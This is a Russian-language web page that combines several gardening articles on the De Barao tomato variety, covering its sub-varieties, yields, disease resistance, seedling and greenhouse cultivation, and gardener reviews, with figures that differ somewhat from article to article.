3 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Описание и характеристика помидор де барао

Какими сортами представлены помидоры Де Барао, какова урожайность и особенности выращивания

Многие садоводы, выращивающие на своих участках томаты, желают получать достойный урожай весь сезон лета и до середины осени, чтобы лакомиться свежими вкусными помидорчиками и вдоволь заниматься заготовками. Для этого в тепличных условиях и на грядках возделываются сорта и гибриды различных сроков спелости. Одним из самых популярных позднеспелых сортов являются помидоры Де Барао, или как их еще любовно называют – Де Барашки.

Удивительно высокие кусты, усыпанные в течении длительного плодоношения овальными небольшими плодами, по выбору разновидности сорта различных цветов, станут настоящими помидорными деревьями на ваших участках и предметом зависти ваших соседей. Этот сорт славится очень равновесными помидорками, удобными для цельноплодного консервирования.

Из статьи Вы узнаете сорте томата Де Барао, получите подробное описание сорта томата, а также его характеристики, разновидности, особенности выращивания и ухода. Уверены, вам будет интересно узнать о его преимуществах и недостатках, о резистентности к заболеваниям, и о том, как бороться с вредителями.

Описание сорта томата Де Барао

Сорт известен среди огородников с конца прошлого века и покоряет до сих пор своей неприхотливостью, возможностью расти в тени, в открытом грунте, давая роскошный урожай с куста до 15 килограмм.

Томат Де Барао вырастает до 4 метров, поскольку это индетерминантный сорт. Рекомендован для выращивания в теплицах, но неплохо чувствует себя и на открытых грядках. Обязательным требованием является подвязывание кустов к опорам или шпалерам. Таких же размеров может достигать и сорт помидор Буденовка.

Отмечается хорошая устойчивость к основным заболеваниям пасленовых.

Кусты мощные, стебли склоны к постоянному побегообразованию, листья обычные, зеленые с темным оттенком. Формирование куста в 1 или 2 стебля.

Соцветия образуются после 9 или 10 листочка, зависит от разновидности, а каждое последующее через 3 листочка. Плоды формируются в одной кисти – до десяти штук.

Этот сорт среднепоздний, то есть созревание плодов начинается со 120 дня, у разных сортов сроки могут варьироваться, после появления первых всходов. Плодоносит Де Барао три месяца.

Плоды различных цветов, в зависимости от вида: от розового до красно-фиолетового, почти все небольшой яйцевидной формы, вытянутого овала. Вес плодов 50-95 гр. Вкусовые качества считаются средними, но многие отмечают нежную кислинку на фоне сладкого помидорного вкуса.

В связи с тем, что плоды аккуратной сливовидной формы – очень хорошая лежкость и транспортабельность. Хозяйки по этой же причине любят консервировать помидоры Де Барао.

Плоды прекрасно дозревают в теплом укрытом от света месте, при снятии зелеными.

Характеристика сорта

Сорт томата Де Барао включен в Госреестр в 2000 году, тем не менее, данные о его урожайности во многих источниках и отзывах разнятся. Это связано с тем, что у разных видов этого сорта немного отличаются ключевые параметры.

Урожайность

С одного куста снимают от 3,5 до 10-15 кг или до 40 кг с 1 м 2 . Это зависит от условий, в которых выращиваются кусты. В тепличных условиях, урожайность – выше.

Устойчивость к заболеваниям и вредителям

Помидоры Де Барао считаются очень устойчивыми к болезням пасленовых, особенно отмечается резистентность к фитофторозу.

Но если идут затяжные дожди с общим похолоданием, уберечь растения довольно трудно. Если вы замечаете больное растение, чтобы избежать распространение болезни на остальные томаты, следует уничтожить больной куст.

Поэтому важны меры профилактики – опрыскивание кустов противогрибковыми препаратами. Народный способ борьбы с фитофторой – чесночный настой и опрыскивание кисломолочными продуктами.

При нарушениях подкормок и недостаточном поливе кусты томата могут заболеть вершинной гнилью. Поэтому так важны удобрения, в том числе содержащие кальций, и нормализация полива. Томаты следует обработать раствором золы.

Важными мерами профилактики заболеваний являются:

  • Рыхление и очень желательно мульчировать землю около корней растения
  • Обрывание нижних рядов пожелтевших листьев.
  • Опрыскивание кустов бордосской смесью.
  • Опрыскивание кустов противогрибковыми препаратами.

По поводу вредителей, томаты Де Барао более всего атакуются проволочником, медведками и слизнями. До завязывания плодов следует провести обработку инсектицидами. Если растение уже плодоносит, то попробуйте нетоксичные средства борьбы с вредителями:

  • Зола.
  • Молотый горький перец.
  • Приманки в междурядьях.

При выращивании томата в теплице регулярно проветривать и следить за влажностью, чтобы избежать тли.

Достоинства и недостатки сорта

Преимущества:

  • Безусловно высокая урожайность (от 4 до 15 кг с куста).
  • Прекрасная лежкость плодов.
  • Отличное дозревание снятых до заморозков зеленых помидорок.
  • Возможность выращивания в открытом грунте, в теневых местах. Очень удобно выращивать около заборов и крепить к ним кусты.
  • Неприхотливость в уходе.
  • Устойчивость к заболеваниям при условии соблюдения профилактических мер.

Недостатки:

  • Высокие кусты требуют обязательного подвязывания, а в теплицах – высоких, не менее 3м, потолков.
  • Обильные вечерние поливы.

Сорта Де Барао

У сорта томата Де Барао существуют разновидности на все вкусы по цвету и размерам плодов:

  • Красный Де Барао – как вы догадались, характеризуется розово-красным цветом. Помидоры созревают на 120-125 день, поэтому относятся к средним позднеспелым. Форма плодов овальная, вес до 95 г.

Сорт томата — Красный Де Барао

  • Золотой Де Барао – плотные и желто-золотистые помидоры поспевают на 110-115 день, относятся к средним позднеспелым. Приятные вкусовые характеристики и оригинальный цвет плодов очень хорош для употребления в свежем виде, так как в помидорах много мякоти.

Золотой Де Барао

  • Черный Де Барао – не абсолютно черного цвета, но очень оригинального: темно-бордового цвета с темно-зелеными и фиолетовыми вкраплениями. Созревает на 115-120 день. Очень популярен в консервировании, особенно красиво выглядят банки в сочетании черных, красных и золотистых Де Барао.

Еще один сорт с темными плодами – Полосатый шоколад

  • Розовый Де Барао – характеризуется розово малиновым цветов плодов с плотной кожицей. Созревают на 115-120 день. Отличаются особо сладким вкусом.

  • Гигант Де Барао – относится к позднеспелым сортам, созревает не ранее 125 дня, лучшие урожаи дает в тепличных условиях. Вес плодов достигает 190 г, очень плотные, овальной формы. Цвет красный и небольшое зеленое пятно у основания. Отличные вкусовые качества, прекрасно транспортируется, высокая лежкость.

Приглянулся сорт Гигант? Советуем посмотреть статью про Минусинские сорта томатов.

  • Царский Де Барао славится очень эстетичными плодами оригинальной формы: равновесные (100-110 г), овальные, с острым носиком. Вид устойчив к непогоде и заболеваниям.

Выращивание и уход

Как уже оговаривалось, помидоры Де Барао лучшие результаты дают в парниковых условиях, при этом высота потолков должна быть не менее трех метров. Для высадки в теплицу семена подготавливают и делают посев уже в последних числах февраля.

У этого сорта можно отнести к особенностям выращивания привычные для большинства садоводов манипуляции по подготовке и посеву семян, рассаде и высадке:

Рассада и высадка в постоянное место

  • Необходимо проверить семена на всхожесть. Замочить их на четверть часа в воде. Всплывшие семена выкинуть.
  • Затем их нужно обеззаразить в слабом растворе марганцовки в течение получаса.
  • Семена высадить стандартным способом в подготовленный и удобренный перегноем грунт в высокие емкости (порядка 12-13 см) и проращивать при температурных параметрах 23-25 о С под пленкой или стеклом
  • После появления первых всходов, примерно через 6-7 дней, снять покрытие и перенести рассаду на светлое место, при температуре 17-18 о С.
  • Через 2 недели после появления первых всходов внести первую подкормку азотистыми и суперфосфатными удобрениями.
  • Пикирование пересадкой делать на фазе 2 настоящих листьев в глубокие емкости
  • За неделю до высадки в постоянное место требуется закаливание рассады в прохладных температурах.
  • Высаживание на постоянное место надо производить на 65-70 (чуть позже в открытые грядки) день с момента появления первых росточков, в прогретую почву, без угрозы заморозков, размещая рассаду по 3-4 куста на 1м 2 по схеме 50*40. При этом делать это лучше в вечернее время.
  • Первую неделю рассаду прикрывать пленочным материалом.

В вегетационном периоде до начала плодоношения требуется соблюдать некоторые рекомендации по выращиванию:

  • Де Барао имеет мощную корневую систему и любит полив. Каждые четыре дня надо выливать на каждый куст три ведра отстоянной воды. На следующий день после увлажнения хорошо рыхлить землю и желательно замульчировать область вокруг стебля – это служит хорошей профилактикой от вредителей.
  • Пасынкование обязательно требуется для формирования куста в 1 или 2 стебля Периодичность пасынкования – 1 раз в 2 недели с удалением всех лишних побегов. На верхушке оставляют только восемь листиков.
  • Подвязывание обязательно – так как растение высокое и урожайное. Подвязывать синтетическим материалом к металлической опоре. Можно к проволочной ограде – Де Барао прекрасно уживается в затененном месте.
  • Удаление сорняков делать регулярно.
  • Обрывать два ряда нижних листьев избегая загущенности кустов.
  • Подкормки комплексными удобрениями для томатов необходимо сделать не менее 2 раз за сезон.

Видео: Помидоры Де Барао: описание и лучшие сорта

Отзывы огородников

Поскольку сорт Де Барао радует огородников уже с 90х годов прошлого века, отзывов на эти помидоры очень много. Негативные и редкие – касаются высоты кустов, посадки, особенностей выращивания, большого количества поливов. Можно сказать, что таких отзывов не было, будь все одинаково трудолюбивы и прилежны.

Большинство отзывов полны восхищения и уважения к сорту:

Выращиваю Де Барао около 15 лет. Жалоб на сорт нет.

Де Барао черный – отличного вкуса, хотя и рос у меня в полутени, на солнце был бы еще вкуснее, причем мякоть достаточно плотная (очень удобно для пиццы и если их вялить), но не жесткая и без каких-либо прожилок, отлично дозревает дома. У меня собранные в октябре с разных сортов помидоры попортились на 30-40%, а с Де Барао вызрели все и остались вкусными, в то время как плоды других сортов, если и долежали, то во вкусе потерялись совсем. И хотя Де Барао действительно высок, но пасынковать удобно, по сравнению с другими высокорослыми сортами. И особо в уходе я не надрывалась, в этом году я это учту, хочу получить более богатый урожай с этого сорта

Это сорт-кормилец. Урожайный, очень вкусный, ничем не болеет. В теплице кормит до самых морозов. А какие банки закатываем – ммм…..

Сроки посадки де барао должны быть ранними, так как это поздний сорт. Если сеять в марте, урожая можно не дождаться до осени. Я сею в феврале и получаю первые разноцветные плоды уже в конце июля. Мне де барашки очень нравятся, у меня высокая теплица и вкус у них хорош. Хоть кушай, хоть в засолку этих красавцев. Сажаю уже 15 лет, собираю свои семена. Пасынки убираю все, в 2 ствола пробовала, не понравилось.

Юля Докучаева (Благовещенск, Амурская область)

Один из полюбившихся сортов. Несмотря на наш суровый Дальневосточный климат, произрастает и плодоносит без проблем в открытом грунте. Стабильные урожаи, хорошо хранится. Предпочитаю красный сорт. Если успеть до заморозков выдернуть куст и повесить в погребе (4-5 градусов) вниз башкой, а корнем вверх, то на Новогодье свеженькие свои помидорчики.

Вы не пожалеете, если выделите на своем садовом участке место под посадку любой разновидности или всех сразу этого замечательного сорта помидор Де Барао. Они станут настоящими украшениями ваших грядок, не потребуют особого ухода, и порадуют вас прекрасным урожаем с июля по конец октября.

Эксперимент обязательно увенчается успехом, если вы воспользуетесь нашей информацией и советами.

Обычно, с кабачками у садоводов не возникает особых проблем, но все же, иногда возможна такая ситуация.

Содержание статьи: Посадка топинамбураПравила выращивания топинамбураСбор урожаяБолезни.

Корневой сельдерей – это очень полезное растение. Благодаря большому содержанию минералов, витаминов и.

Содержание статьи: Способ 2: Прививаем огурец методом уколаСпособ 3: Прививка огурца на тыкву методом.

Содержание статьи: Правильный полив томатовНеобходимость рыхления и прополокПодкормки и.

Этот сайт использует Akismet для борьбы со спамом. Узнайте как обрабатываются ваши данные комментариев.

Отправляя сообщение, Вы разрешаете сбор и обработку персональных данных.
Политика конфиденциальности.

Гроздья помидоров в любой сезон: урожайный и вкусный томат Де Барао

Большинство новичков осваивают агротехнику помидоров с низкорослых и не требующих особого ухода сортов. Между тем, в группе индетов также есть неприхотливые, отличные томаты, среди которых урожайностью и вкусом выделяется Де Барао. Сорт популярен и любим многими, а выращивают его в самых разных регионах страны.

Лучший сорт для консервации

Де Барао появился на территории России еще в 90-х годах, родом он из Бразилии. Сегодня выведены разные сорта томата, имеющие сходные характеристики, но отличающиеся по описанию плодов (разные вес и цвет).

Спрашивайте и получайте полезные советы от профессиональных садоводов и опытных дачников.Задать вопрос >>

Высокорослый гигант вырастает в теплицах до 2-3 метров, куст мощный, с раскидистыми ветками. Облиственность средняя, листочки некрупные, темно-зеленой окраски.

По срокам созревания – позднеспелый томат, поэтому в регионах с суровым климатом выращивается только в теплицах. Первые помидорчики с кустов томата снимают через 120-125 дней после появления всходов, плодоношение длительное, до поздней осени.

НА ЗАМЕТКУ! Выращивая помидоры Де Барао, учитывайте высокий рост растения и подбирайте соответствующей высоты укрытия.

Первая цветочная кисть формируется после 9 листа, затем соцветия идут через три листа. В одной кисти – 7-10 плодов овальной формы.

Окраска зависит от сорта и учитывая фото и описание, выбирают для выращивания черный, золотой, красный, оранжевый или розовый Де Барао. Вес каждого помидора – 80-100 граммов, кожица и мякоть плотные, внутри – две камеры. В плодах содержится большое количество семян, так что при желании в любой сезон огородники собирают семенной материал для последующих посадок.

Вкусовые качества – высокие, и в отличие от гибридных форм томатов, помидоры этого сорта нравятся всем. Они идеально подходят для консервации, засолки. В маринаде и рассоле не теряют форму, не трескаются, очень вкусные.

Используют их для нарезки, на бутерброды, для оформления праздничных блюд. Помидорки снимают в состоянии технической спелости, они отлично дозревают потом в домашних условиях. Сроки хранения – до 2-2,5 месяцев без потери вкусовых качеств и товарного вида.

Разновидности Де Барао

Семейство Де Барао включает в себя несколько подвидов, описание и характеристика которых представлена ниже.

Урожайный красный томат Де Барао – один из самых известных сортов серии, выращивается для цельноплодного консервирования. Помидоры в форме сливок, плотные, насыщенного красного цвета.

Вес плодов: 80-120 граммов. Лежкий (до 2-х месяцев) сорт.

Мощный раскидистый куст образует до 12 соцветий с красивыми овальными плодами. Высота растения – 2,5-3 метра. Помидоры розового цвета, плотные, весом около 70 граммов. Плоды прекрасны для засолки, в свежем виде, в консервации.

Сорт томатов полностью соответствует названию, так как помидоры, действительно, имеют большой вес (до 300-350 граммов) и отличный вкус.

Куст высотой до 2,7-3 метров, плоды ярко-красные, с сочной мякотью. Используется Де Барао Гигант для консервирования, а также приготовления соусов, кетчупов, салатов.

Разновидность помидоров Де Барао, отличающихся красивым розовым цветом плодов.

Как и Гигант, сорт томат Царский – крупноплодный помидор, который используют в консервацию, в свежем виде, для приготовления пасты и соусов. По описанию форма плодов – округло-овальная, средний вес достигает 150-170 граммов.


Очень вкусный томат Желтый Де Барао, который в продаже часто предлагается под названием Золотой. Плоды у него овальные, очень плотные, весом 70-80 граммов. Вкус – отличный, лучше всего проявляется при засолке и в маринадах.

Интересен сорт томата Де Барао с яркими оранжевыми сливками, которые великолепно смотрятся в различных заготовках. Плоды овальные, с плотной глянцевой кожицей, весом 80-100 граммов.

Плодоносит до самых заморозков, не боится фитофторы. Показательны отзывы о томате Де Барао такого цвета, многие огородники отмечают у плодов Оранжевого особенную сладость.

Есть желание вырастить экзотический томат? Тогда обратите внимание на сорт помидор Де Барао черный, с темно-бордовыми плодами.

Помидорки овальной формы, массой 50-80 граммов, со сладкой и ароматной мякотью. Плоды отличаются высокими товарными качествами и очень хороши в свежем виде, пригодны для консервации, маринования, вяления.

С куста снимают до 5 кг помидоров.

Еще один подвид – полосатый Де Барао, удивляющий всех сладкими плодами необычной расцветки.

Высокорослые кусты имеют толстый стебель, на растении образуется до 12 кистей. Помидорки маленькие, овальной формы, весом до 60-70 граммов. Неспелые плоды – светло-зеленого цвета с темными прожилками, при созревании томаты становятся красными с бордовыми полосами.

Ценность и недостатки сорта

Разновидности Де Барао известны многим, сорт охотно выращивают на юге, в средней полосе, за Уралом. Индетерминантный томат имеет следующие преимущества:

  • неприхотливость (редкое свойство у высокорослых помидоров);
  • отличные вкусовые качества;
  • стойкость к вредителям и болезням (особенно к фитофторозу);
  • высокую урожайность (с 1 кв. метра снимают от 8 до 12 кг плодов);
  • универсальность использования плодов;
  • устойчивость к перепадам температур, затенению;
  • могут культивироваться как в открытом грунте, так и в теплице.

Отменная продуктивность сорта позволяет высадить 2-3 куста в теплице и снять в конце сезона высокий урожай. Главное – учесть все особенности агротехники высокорослых томатов и обеспечить полноценный уход.

  • поздние сроки созревания, из-за чего рекомендуют выращивать томат в теплице;
  • необходимость формирования куста и пасынкования.

Теперь вам известны все достоинства и недостатки сорта томата, и думается, что перечень «плюсов» все же перевесит «минусы».

Немного об особенностях агротехники

Посадка и уход – вполне традиционные для индетерминантных томатов. Де Барао выращивается через рассаду, при наступлении тепла высаживается в теплицы или на гряды (южные регионы).

Выращивание рассады

Когда сажать рассаду? Посев томатов проводят в конце февраля или первых числах марта, предварительно продезинфицировав семена в марганцовке. Высевают в общие ящики, прикрывая их стеклом, затем, как только появятся всходы, емкости выставляют на свет.

Заранее готовят отдельные горшочки или стаканчики (пластик, бумага), в которые при появлении у сеянцев 2-3 настоящих листочков, распикировывают рассаду. Прием позволяет избежать вытягивания растений, улучшает состояние корневой системы. Рассада помидоров требует досвечивания, умеренного полива теплой водой.

Высадка томатов

Сроки высадки томатов на постоянное место определяются по погоде, с учетом климата региона и условий выращивания (гряды, укрытия).

Почва должна прогреться до +14 о С…+16 о С. В теплицы в средней полосе высаживают с начала мая, на гряды открытого грунта – уже в первой декаде июня. Желательно на первое время прикрывать томаты нетканым материалом для защиты от похолоданий, ярких солнечных лучей.

Очень высокорослый Де Барао высаживают в лунки по два растения на один квадратный метр. Заранее готовят шпалеры или колья для подвязки.

Уход за томатами

Примерно 4-5 дней после высадки растения не поливают, затем осуществляют обычный уход. В него входят:

  • поливы;
  • подкормки;
  • мульчирование;
  • профилактика болезней и вредителей.

Обязательным приемом является формирование растения, для чего определяются с количеством стеблей и убирают лишние побеги.

Поливают томаты регулярно, ориентируясь по погоде и состоянию растений. Воду используют теплую (+22 о С), отстоянную. В период цветения и завязывания плодов под каждый куст требуется до 4-5 литров, затем объемы сокращают, чтобы плоды не стали водянистыми.

Томаты нуждаются в рыхлении почвы, а заменить его можно мульчированием. Для мульчи подойдут скошенная трава, солома, перегной. Слой мульчи обычно составляет 4-5 см. Это избавит вас от прополки, также мульча сохраняет влагу в почву, исключает засуху.

Томаты не любят повышенной влажности воздуха. Поливы проводят под корень, исключая попадание воды на листья и ветки. Лучше всего использовать системы капельного полива, также можно сделать бороздки или лунки и выливать воду в них.

Формируют Де Барао в 2-3 стебля, оставляя два самых мощных побега. Пасынки удаляют своевременно, оставляя пенек в 1,5 см. Желательно обрывать пасынки утром, чтобы сломы на ветках с вечеру затянулись, и в них не попала инфекция.

Удаляют также листья – в нижней части стебля под первой цветочной кистью. К моменту созревания плодов в этой кисти стебель ниже ее должен быть «голым». Разрешается за один прием убирать 1-2 листа. Это способствует лучшей вентиляции воздуха в укрытии, исключает загущенность посадок.

Де Барао отличается хорошей устойчивостью к заболеваниям, но профилактика нужна и ему. От болезней используют опрыскивания растений бордоской жидкостью, настоями чеснока, молочной сыворотки. При соблюдении всех рекомендаций агротехники болезней у этого сорта, обладающего высоким иммунитетом, не наблюдается.

Плоды снимают в состоянии технической спелости (зелеными), чтобы дать возможность успеть сформироваться всем завязавшимся на кусте помидорам. Этот сорт отлично дазаривается дома.

Урожайный высокорослый Де Барао давно «прописался» на участках дачников и огородников. Так что если вы желаете быть всегда с урожаем, самое время обратить внимание на этот сорт.

Томат Де Барао: характеристика и описание видов сорта, фото, достоинства и недостатки, отзывы

Томат Де Барао характеристика и описание сорта которого предложено в этой статье, появился в 90-е годы и сразу завоевал широкую известность среди садоводов и огородников. Сорт томатов Де Барао стал популярным благодаря тому, что устойчив ко многим заболеваниям пасленовых и дает хороший урожай. На сегодняшний день существует немало видов сорта томатов Де Барао, о которых будет рассказано ниже.

Описание и характеристика сорта

  • Де Барао – это сорт высокорослых томатов. Они характеризуются стабильным урожаем и хорошей устойчивостью к заболеваниям.
  • Кусты индетерминантные, стебель растет на неограниченную высоту, поэтому требует прищипывания.
  • Позднеспелый. Плоды созревают поздно: через 115-120 дней после появления всходов.
  • Существуют разновидности сорта с плодами разной формы и цвета (красный, розовый, желтый, черный).
  • Возможна культивация не только в теплице, но и в открытом грунте.
  • Стебель мощный, множество крупных остроконечных листьев темно-зеленого цвета.
  • Стебель может тянуться в высоту до 4 метров.
  • Как показала практика, куст лучше формировать в 1-2 стебля, а также своевременно проводить пасынкование и подвязку.
  • Сорт устойчив к заболеваниям пасленовых.
  • Соцветия простые и компактные, первые образуются на уровне 9 или 11 листа, однако все зависит от разновидности. После первого соцветия все остальные начинают формироваться через каждые 3 листа.
  • На кусте образуется приблизительно 10 кистей. На каждой из них формируется до 7 плодов. Важной особенностью сорта томатов Де Барао является стабильно высокий урожай, не смотря на перемену погоды. Причем, кусты плодоносят до первых заморозков.
  • Урожайность высокая. С 1 кв. местра можно собрать до 40 кг помидоров хорошего качества. 1 куст может дать почти 20 кг томатов.
  • После сбора плоды можно хранить до 2 месяцев.
  • Томаты хорошо переносят перевозку на дальнее расстояние.

Характеристика плодов

  • Форма томатов – сливовидная.
  • Созревшие помидоры разных подвидов могут иметь такие цвета: красный, розовый, желтый, черный.
  • Средний вес одного томата — от 90 до 130 г.
  • Имеет 2 семенных камеры с большим количеством семян.
  • Содержат много сухих веществ.
  • Перед заморозками недозревшие томаты снимают и укладывают в темное место. Там они дозревают и могут долго храниться.
  • Кожица гладкая, не слишком плотная.
  • Мякоть мясистая, сочная, сладкая с небольшой кислинкой.

Достоинства и недостатки

Этот сорт томатов наделен массой положительных свойств:

  • Простой уход.
  • Хорошо растет на полузатененном участке.
  • Может выдержать небольшие морозы.
  • Стабильный высокий урожай.
  • Сорт устойчив к большинству заболеваний.
  • После снятия с куста плоды можно долго хранить.

Сорт Де Барао почти не имеет никаких недостатков. Единственно то, что во время выращивания мощные кусты требуют своевременного удаления пасынков и излишней зеленной массы. Также, не всегда бывают положительные отзывы: не всем нравится кислинка в томатах.

Виды – чем они отличаются

Ученые вывели много подвидов Де Барао, которые несколько отличаются по характеристикам и описанию. Различаются они по таким признакам:

  • Форма плода;
  • цвет томатов;
  • вкусовые качества.

Рассмотрим разновидности томатов сорта Де Барао.

Розовый

  • После того, как появились всходы, розовые томаты созревают через 115 дней.
  • Окончательно созревшие плоды имеют приятный розовый цвет.
  • Урожайность этой разновидности томатов по сравнению с другими несколько меньше – до 4 кг.
  • Плоды весят примерно 70 г.
  • Однако, розовые помидоры обладают толстой шкуркой и приятным вкусом.

  • Выдерживают небольшие морозы.
  • Могут расти в тени.
  • Хорошая устойчивость к заболеваниям.
  • Стабильный урожай.

Красный

  • Помидоры поспевают за 120-130 дней после появления первых ростков.
  • Основной стебель достигает до 2 метров в высоту.
  • Средний вес одного плода — 90 г.
  • С одного куста можно собрать около 4 кг помидоров.
  • Растения хорошо развиваются и в открытом грунте и в теплице.

К достоинствам вида можно отнести такие качества:

  • прекрасно развивается даже в тени;
  • не подвергается заболеваниям;
  • выдерживает низкие температуры воздуха;
  • плоды красивые и имеют отличный товарный вид.

К недостаткам можно отнести то, что мощные кусты необходимо пасынковать и удалять лишнюю листовую массу.

Красные помидоры прекрасно подходят для консервирования. Если их соединить в одной банке с золотым подвидом, заготовка будет очень красиво смотреться.

Золотой

  • Золотой Де Барао, обладает отменными вкусовыми качествами.
  • Плоды имеют золотистый цвет.
  • Созревают в течение 115 дней.
  • К осени с 1 куста собирают до 7 кг золотых плодов (еще их называют желтыми).
  • В составе овоща содержится каротин в большом количестве.

Достоинства:
  • Может развиваться в полутени.
  • Плодоношение высокое и стабильное.
  • Не поддается поражению болезней.
  • Переносит понижение температуры.
  • Ветвистые кусты имеют большие размеры.
  • Излишняя зеленая масса, которую следует удалять.

Оранжевый

  • В среднем этот томат полностью поспевает через 125 дней.
  • Высота куста около 3 метров.
  • Очень вкусные томаты имеют форму сливы.
  • Каждый плод весит до 100 г.
  • Благодаря большому количеству каротина, находящегося в этих помидорах, они обладают таким красивым цветом.
  • Этот вид можно выращивать и в теплице, и на открытых участках.
  • Томаты используют для приготовления салатов и для консервирования.
  • С 1 куста при хорошем уходе собирают почти 12 кг помидоров. Причем, куст плодоносит до наступления морозов.
  • Томаты обладают положительными качествами, которые имеются у всех подвидов Де Барао.

Черный

Характеристика этой разновидности, практически ничем не отличается от других томатов сорта Де Барао. Однако, эти плоды темного фиолетово цвета, почти черные.

Вес одного плода — 50 г.

Сбор урожая можно начинать через 115 дней после появления ростков.

Полосатый

  • Этот вид томатов имеет овальную форму.
  • Вес 1 плода может достигать 70 г.
  • Созревший плод красного цвета с коричневыми полосками.
  • Помидоры обладают прекрасными вкусовыми качествами, плотные.
  • Их можно использовать для заготовок на зиму.
  • Полосатый подвид устойчив к заражению такого заболевания, как фитофтороз.

Царский

  • Растение достигает в высоту до 250 см.
  • На нем формируется до 10 кистей, на каждой из которых созревает около 7 плодов светло красного цвета.
  • Каждый помидор весит до 130 г.
  • Данный подвид Де Барао является очень плодоносным. С 1 куста в среднем за сезон собирают от 15 до 20 кг томатов.
  • Семена Царских помидор сложно купить, так как они относятся к самым редким сортам томатов.

  • Высокая урожайность и отдача плодов до наступления морозов.
  • Не подвергается грибковым заболеваниям.
  • Собранный урожай долго хранится.
  • Используется для приготовления различных блюд, а также для консервирования.
  • Выдерживает низкие температуры воздуха.
  • Необходимо устанавливать крепкую опору для куста, который имеет большой и мощный стебель.
  • Требует своевременного удаления лишних побегов и листьев.

Гигант

  • Основной стебель этого подвида достигает отметки 2 метра и больше.
  • Плоды Гиганта имеют форму сливы. После созревания они приобретают красный цвет и весят около 150 г.
  • Один куст дает до 6 кг томатов.
  • Этот сорт помидоров созревает позже всех среди подвидов сорта Де Барао.

Особенности выращивания

Важной особенностью этих томатов является их рост. Некоторые сорта могут достигать до 4 метров в длину. Поэтому высота теплицы для томатов Де Барао должна быть около 3-х метров в высоту.

Семена высаживают в конце февраля в специальные ящики, которые устанавливают в теплице. Процедура пикирования проводится тогда, когда на всходах появятся по 2 крепких листочка. Ростки переносят в стаканчики, объемом в 500 г. Через 60-70 дней после посадки семян рассаду высаживают в теплицу, немного позже — в открытый грунт.

На юге России для выращивания томатов в открытом грунте семена на рассаду сеют в середине марта. В регионах средней полосы семена начинают высевать в конце третьей декады марта.

В грунт саженцы высаживают шахматным или линейным методом по схеме — 2 растения на 1 кв. метр.

Подробно о выращивании томатов рассказано в статье: Технология выращивания томатов. Секреты посадки и ухода.

Применение

Томаты используют в свежем виде, а также для приготовления салатов и закусок. Благодаря небольшим размерам плодов их удобно применять для консервирования и маринования. При этом, помидоры не лопаются и прекрасно держат форму. Из-за плотной структуры плодов, из них не готовят соки.

Посмотрите видео! Томат Де Барао

Отзывы кто сажал

Томаты Де Барао любят многие огородники и часто выделяют этот сорт, указывая на его вкусовые качества и высокую урожайность. Мы выбрали реальные отзывы огородников экспертов, которые предложены ниже в нашей статье.

Давид Сергеевич, Ярославская область

Алена Михайловна, Самарская область

Алла Федоровна, Тюменская область

Татьяна Александровна, Липецкая область

Инна Леонидовна, Псковская область

Марина Юрьевна, Тверская область

Ольга Викторовна, Брянская область

Наталья Вячеславовна, Саратовская область

Томат «Де Барао черный»: описание сорта, фото и отзывы

В данной статье мы расскажем о характеристиках томата «Де Барао черный» и специфике возделывания этого сорта.

Помидоры «Де Барао» культивируются в нашей стране уже не один десяток лет, но и сегодня они занимают видное место на российских огородах. Дачники ценят эти растения за неприхотливость, высокую урожайность и прекрасные потребительские качества плодов. В линейку входит пять сортов «Де Барао», зарегистрированных в Государственном реестре: «красный», «золотой», «оранжевый», «розовый» и «черный». Различаются они окраской и формой плодов. Кроме того, в продаже встречается посевной материал других разновидностей – «желтый», «царский», «гигант», «малиновый» и даже «черный полосатый». Не исключено, что некоторые из них в ближайшее время будут признаны официально.

Начнем с перечня основных характеристик сорта:

Параметр Характеристика
Культура Томат (Solanum lycopersicum L. var. lycopersicum)
Срок созревания Позднеспелый
Период от всходов до плодоношения 120-130 дней
Товарная урожайность До 8 кг/м2
Масса плода 50-60 г
Форма Яйцевидная, гладкая
Окраска зрелых плодов Фиолетово-коричневая
Кожица Прочная, не склонная к растрескиванию
Мякоть Плотная, ароматная
Число гнезд 2-3
Вкусовые качества Хорошие
Транспортабельность и лежкость Высокие
Назначение Салатное, консервное (пригоден для цельноплодного консервирования)
Тип растения Индетерминантное, высокорослое (до 200 см в теплицах)
Листья Среднего размера, темно-зеленые
Соцветие Простое; первое закладывается над 9-11-м листом, последующие – через 3 листа
Особенности выращивания Требует подвязки и формирования растений (в 1-2 стебля)
Устойчивость к заболеваниям Сорт слабовосприимчив к фитофторозу и другим основным заболевания культуры; вынослив к перепадам температур
Рекомендуемые регионы выращивания Все регионы (в необогреваемых пленочных теплицах и в открытом грунте)
Год регистрации в ФГБУ «Госсорткомиссия» 1999
Оригинатор ООО Селекционно-семеноводческая фирма «Гисок» (г. Москва)

Характеристика сорта и особенности выращивания

Сорт включен в Государственный реестр в 1999 году. Семена производят и реализуют большинство известных агрофирм («СеДеК», «Гавриш», «Аэлита» и многие другие). Томат можно выращивать во всех регионах страны в открытом грунте и летних укрытиях.

Растения развиваются по индетерминантному типу. Кусты высокие, в теплице вырастают до 200 см и более. Стебли прочные, но могут ломаться под грузом спелых плодов. Поэтому их рекомендуют подвязывать к опоре. Сорт обладает повышенной устойчивостью к основным заболеваниям томатов, в том числе, к фитофторозу.

«Де Барао черный» – томат позднего срока созревания (120-130 дней от появления полных всходов). В регионах со сложными погодными условиями сорт лучше выращивать в теплицах. Плоды выровненные, массой от 50 до 60 г, яйцевидные, темно коричневой окраски с фиолетовым оттенком. Мякоть плотная, очень приятного вкуса. Шкурка прочная, не склонная к растрескиванию. При грамотной агротехнике с квадратного метра посадки за сезон можно снять до 8 кг помидоров.

Как и большинство позднеспелых, сорт требует раннего посева. В средней полосе это рекомендуют делать примерно в середине февраля. Рассаду высаживают на постоянное место в возрасте 70-75 дней. На квадратном метре размещают не более 4 растений. Кусты формируют в 1-2 ствола, прищипывая их после появления 5-7 цветочных кистей. Сорт устойчив к колебаниям температуры, но нуждается в регулярных поливах и внесении подкормок.

Среди несомненных достоинств сорта нужно отметить:

  • неприхотливость и отсутствие проблем с возделыванием;
  • устойчивость к болезням;
  • урожайность;
  • хорошие вкусовые качества;
  • транспортабельность и лежкость плодов;
  • пригодность помидоров к цельноплодному консервированию.

Сорт вполне можно рекомендовать тем дачникам, которые пока не имеют солидного опыта выращивания помидоров. По отзывам, томат «Де Барао черный» – растение, которое неплохо переносит капризы погоды, а в защищенном грунте, при условии проведения дополнительных обработок против болезней, может плодоносить до конца сентября, что увеличивает вероятность получения богатого урожая.

Отзывы

Георгий, 42 года, Ленинградская область

